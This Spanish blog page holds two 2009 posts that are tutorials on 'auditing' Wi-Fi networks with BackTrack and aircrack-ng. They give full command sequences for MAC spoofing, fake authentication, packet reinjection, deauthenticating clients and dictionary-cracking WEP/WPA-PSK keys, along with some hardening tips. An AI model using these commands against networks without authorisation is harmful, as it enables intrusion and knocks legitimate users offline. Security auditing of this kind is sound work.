Páginas

Mostrando entradas con la etiqueta Backtrack. Mostrar todas las entradas
Mostrando entradas con la etiqueta Backtrack. Mostrar todas las entradas

lunes, 27 de abril de 2009

BackTrack - Auditoria de Redes Wireless II

Auditoria de Redes - Entendiendo lo que hacemos.

Los lamers son gente que se creen hackers pero hackean mediante programas creados por otras personas. Insultan a los programadores y se creen los mejores por saber utilizar programas hechos por otros. A esta clase de lamer, se le conoce mejor actualmente como "script kiddie".

Requisitos previos:

Hardware --> WNIC --> modo monitor
ANTENA --> aumenta el radio de accion. Mayor sesibilidad. 7dbi

Software --> Airodump-ng desde estaciones GNU-Linux (no podia ser de otro modo).
Airmon-ng
Aireplay-ng
Aircrack-ng
Kismet

Distribucion de GNU-LinuX a utilizar BACKTRACK 4

1. Identificacion y recopilacion de informacion. El ataque se dirige a un AP.

SSID
MAC
CHANNEL
ASOCIADO

Para esto utilizaremos airodump-ng.
Analiza las tramas y captura paquetes.

Para aumentar el trafico en la red se realizan los ataques. Para forzar el trafico. Se envian tramas al AP para provocar reacciones del entorno del AP. Los ataques se realizan con el aireplay. Los mas comunes son:
a) Ataque 0 (cero) Desautenticacion. Provoca la desconexion de uno o todos los clientes. Los clientes intentaran conectarse nuevamente al hacerlo enviaran informacion que sera capturada con el airodump-ng.
b) Ataque 1 (uno) Autenticacion falsa.
c) Ataque 3 (tres) reinyeccion de trafico. Aumentar velocidad del trafico. Forzar al cliente y al AP a que comuniquen mas cosas.
d) Buscar la clave con el aircrack-ng
e) Asociarse utilizando la clave encontrada.
f) IP valida. DHCP o en su defecto IP fija dentro del rango de la red de los demas ordenadores.
g) Puerta de enlace y DNS.
h) Ataque al Router.

Obstaculos:

1. ISSD oculta. jack tools (detecta el SSID). ESSID - jack
2. Filtrado de MAC. Spoofing --> macchanger cambia el numero de MAC. Suplanta la identidad de otro.

Consejos de seguridad. Desde la capa uno hasta la 3.

1. Limitar la señal. Bajar la potencia de emision para que tengan menos alcance. Full signal --> bajar la potencia de señal. Cuanto menos potencia para cubrir el area que necesito mejor.
2. Filtrado MAC.
3. Oculto SSID.
4. Autenticado --> PSK, Shared Key (WEP), Radius.
5. WPA2.
6. Cambio periodico de claves.
7. Desactivar DHCP.
8. Cambiar valores por defecto.
9. Monitorizar AP.

Hay programas recopiladores de WEP. Desde el punto de vista de empresas el acceso desde CD-ROM, USB, se desabilita.

Para cambiar a modo monitor la tarjeta Wireless puede utilizarse

root@syslinux~# iwconfig wlan1 mode monitor

para pasar a modo managed

root@syslinux~# iwconfig wlan1 mode managed.

Para hacer un enlace o apuntando al AP. La tarjeta tendra el registro de ese AP

root@syslinux~# iwconfig wlan1 mode monitor channel 6 (del AP al que quiero asociarme) essid nombre_ap

Capturar las tramas

root@syslinux~# airodump-ng wlan1 -w archivo -c (o --channel) 6.

abrir otra consola.

Inyectar trafico, (Solo tiene sentido si esta asociado a un cliente.)

root@syslinux~# aireplay-ng -3 wlan1 -b mac_objetivo -h mac_mi_wnic.

si no hay nadie conectado asocie su dispositivo wireless.

aireplay-ng -1 30 (intentos de conexion) wlan1 -e ssid -a mac_objetivo -h mac_dispositivo_miwnic

respondera asociation succesful !

abrir otra terminal

aireplay-ng -3 wlan1 -b mac_objetivo -h mac_dispositivo -x (paquetes/segundo) 300

abrir otra consola. Encontrando la clave WEP.

aircrack-ng *.cap

sábado, 25 de abril de 2009

BackTrack - Auditoria de Redes Wireless I

Utilizar BackTrack. Comprobar vulnerabilidades en Redes Wireless (WEP, WPA-PSK).

Conectar la tarjeta de Red y cargar el modulo de la tarjeta (dependera del Chipset de su tarjeta wireless).
lsmod para ver los modulos rmmod y modprobe para cargar y descargar modulos.

root@syslinux~# modprobe rt073usb

- comprobar interface con ifconfig

- poner en modo monitor

root@syslinux~# iwconfig rausb0 mode monitor

- desactivar interface

root@syslinux~# ifconfig rausb0 down

- cambiar MAC de la tarjeta

root@syslinux~# macchanger -m 00:55:44:33:22:11 rausb0

- levantar interface

root@syslinux~# ifconfig rausb0 up

- listar redes al alcance de mi tarjeta wireless

root@syslinux~# airodump-ng rausb0

- Elegir objetivo. Ctrl+c (para detener el scaneo de redes)

- capturar en un solo canal y guardar en archivo

root@syslinux~# airodump-ng rausb0 -w archivo -c channel

- mientras airodump captura paquetes abrimos otra Consola para inyectar paquetes y aumentar el trafico.

- si esta asociado.

root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h macstation rausb0

- autenticarse - asociarse (mi mac cambiada)

root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h 00:11:22:33:44:55 rausb0

- inyectar paquetes utilizando cliente falso

root@syslinux~# aireplay-ng -3 -b macobjetivo -h 00:11:22:33:44:55 rausb0

- inyectar paquetes utilizando station

root@syslinux~# aireplay-ng -3 -b macobjetivo -h macstation rausb0

Algunos puntos de acceso requieren reasociarse cada 20 segundos, si no el falso cliente se considera desconectado. Asociarse cada 20 segundos.

aireplay-ng -1 20 -e WLAN_13 -b macobjetivo -h maccambiada rausb0

- en este punto la captura de pqtes en airodump-ng debe aumentar

- desautenticando clientes para obligarles a reasociarse
- WPA Handshake capture.

root@syslinux~# aireplay-ng -0 5 -a macobjetivo -c macstation rausb0

- si aun no funciona

root@syslinux~# aireplay-ng -0 10 -a macobjetivo rausb0

- Buscar la clave con aircrack-ng

- aircrack-ng archivo*.cap

- Ataque de diccionario (aircrack-ng) WPA-PSK

- Descargar diccionarios http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

- Crear diccionario

root@syslinux~# zcat all.gz | egrep -v '^#' > dic

- Utilizar diccionario

root@syslinux~# aircrack-ng -w dic -0 archivo*.cap